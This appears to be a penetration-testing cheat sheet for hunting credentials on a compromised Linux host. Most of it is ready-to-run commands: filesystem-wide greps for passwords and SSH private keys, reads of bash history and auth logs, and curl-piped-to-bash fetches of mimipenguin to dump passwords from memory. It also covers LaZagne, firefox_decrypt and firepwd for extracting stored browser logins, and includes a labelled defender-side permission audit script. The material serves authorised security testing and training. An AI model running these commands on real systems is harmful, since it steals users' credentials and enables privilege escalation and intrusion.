PRIMARY CATEGORY → CREDENTIAL HUNTING   •   LINUX PRIVESC

Theory

Credentials Resources

Files: Configs, Databases, Notes, Scripts, Source Code, Cronjobs, SSH Keys
History: Logs, Command-Line History
Memory: Cache, In-Memory Processing
Key-Rings: Browser Stored Creds

Configuration Files

.conf    •    .config    •    .cnf    

Find
Search all Configuration Files on the System (Above File Extensions)
for _file in ".conf" ".config" ".cnf"
do
	printf "\nFile Extension: %s\n\n" "$_file"
	find / -iname "*${_file}" 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
done
Search for the specified Words in all the System Configuration Files
for _file in ".conf" ".config" ".cnf"
do
	printf "\nFile Extension: %s\n\n" "$_file"
	find / -iname "*${_file}" -exec grep -iP --color -- 'user|password|pass' {} + 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
done

Databases

.sql    •    .db    •    .bd

Find
Search all Database Files on the System (Above File Extensions)
for _file in ".sql" ".db" ".bd"
do
	printf "\nFile Extension: %s\n\n" "$_file"
	find / -iname "*${_file}" 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
done

Notes

Find
find /home/* -type f \( -iname "*.txt" -o ! -iname "*.*" \)

Scripts

.py    •    .pyc    •    .pl    •    .go    •    .jar    •    .c    •    .sh

Find
for _file in ".py" ".pyc" ".pl" ".go" ".jar" ".c" ".sh"
do
	printf "\nFile Extension: %s\n\n" "$_file"
	find / -iname "*${_file}" 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
done

CronJobs

cat /etc/crontab
ls -la /etc/cron.*/

SSH Keys

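SSH Private Keys
# -n prefixes each match with its line number, so ":1:" keeps only matches on a file's first line
grep -RinP --color -- "PRIVATE KEY" / 2>/dev/null | grep ":1:"
SSH Public Keys
grep -RinP --color -- "ssh-rsa" / 2>/dev/null | grep ":1:"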
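
The configuration-file and private-key searches above, turned into a permission audit a defender can run on their own hosts. This is an added example, not part of the original notes. It assumes GNU find and stat, the function names audit_configs and audit_keys are made up here, and the keyword list is narrowed to password-like settings.

```shell
#!/bin/sh
# Added example (not from the original page): defender-side permission audit.
# Assumes GNU find/stat. Output is "<KIND> <octal mode> <path>"; the matched
# line is never printed, so the report does not itself leak secrets.

# audit_configs ROOT
# Config files (.conf/.config/.cnf, the extensions used above) that contain a
# password-like setting and are readable by group or other.
audit_configs() {
	find "$1" -xdev -type f \
		\( -iname '*.conf' -o -iname '*.config' -o -iname '*.cnf' \) \
		-perm /044 \
		-exec grep -liE -e '(password|passwd|pass)[[:space:]]*[=:]' {} + \
		2>/dev/null |
	while IFS= read -r f; do
		printf 'CONFIG %s %s\n' "$(stat -c '%a' "$f")" "$f"
	done
}

# audit_keys ROOT
# Files whose first line is a PEM/OpenSSH private-key header and whose mode
# grants any access to group or other (ssh itself refuses such keys).
audit_keys() {
	find "$1" -xdev -type f -size -64k -perm /077 2>/dev/null |
	while IFS= read -r f; do
		if head -n 1 "$f" 2>/dev/null |
			grep -qE 'BEGIN ([A-Z]+ )?PRIVATE KEY'; then
			printf 'KEY %s %s\n' "$(stat -c '%a' "$f")" "$f"
		fi
	done
}

# Run both checks when a root directory is given, e.g.: sh audit.sh /etc
if [ "$#" -gt 0 ]; then
	audit_configs "$1"
	audit_keys "$1"
fi
```

Each reported path is a candidate for chmod 600 (or 640 with a dedicated group) or for moving the secret out of the file altogether.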

History

Bash History
less /home/*/.bash*

Logs

for i in /var/log/*
do
	# Only regular files; skip sub-directories
	[ -f "$i" ] || continue
	# Authentication, session, account and sudo events
	GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND=\|logs" "$i" 2>/dev/null)
	if [[ $GREP ]] ; then
		echo -e "\n#### Log file: $i"
		echo "$GREP"
	fi
done

Memory and Cache

Mimipenguin

Python Script
curl --silent --location --request GET "https://github.com/huntergregal/mimipenguin/raw/refs/heads/master/mimipenguin.py" --output mimipenguin.py
python3 !$
Bash Script
bash - < <( curl --silent --location --request GET "https://github.com/huntergregal/mimipenguin/raw/refs/heads/master/mimipenguin.sh" )
Lazagne

Setup
git clone https://github.com/AlessandroZ/LaZagne Lazagne
python3 -m venv .venv
. !$/bin/activate && pip3 install -r ./Lazagne/requirements.txt
Usage
python3 ./Lazagne/Linux/laZagne.py all

Browsers

Firefox

Stored Credentials

Locate the Firefox profile directories, which hold the logins.json files
find /home/*/.mozilla/firefox -type d -iname '*default*'
Firefox Decrypt

curl --silent --location --request GET --remote-name "https://github.com/unode/firefox_decrypt/raw/refs/heads/main/firefox_decrypt.py"
python3 firefox_decrypt.py
Firepwd

git clone https://github.com/lclevy/firepwd Firepwd
python3 -m venv .venv
. !$/bin/activate && pip3 install -r ./Firepwd/requirements.txt
python3 ./Firepwd/firepwd.py # Or
python3 ./Firepwd/firepwd.py --dir=<DIRECTORY_PROFILE>
Lazagne

  • Setup ⚙️
git clone https://github.com/AlessandroZ/LaZagne Lazagne
python3 -m venv .venv
. !$/bin/activate && pip3 install -r ./Lazagne/requirements.txt
  • Usage ⚒️
python3 ./Lazagne/Linux/laZagne.py browsers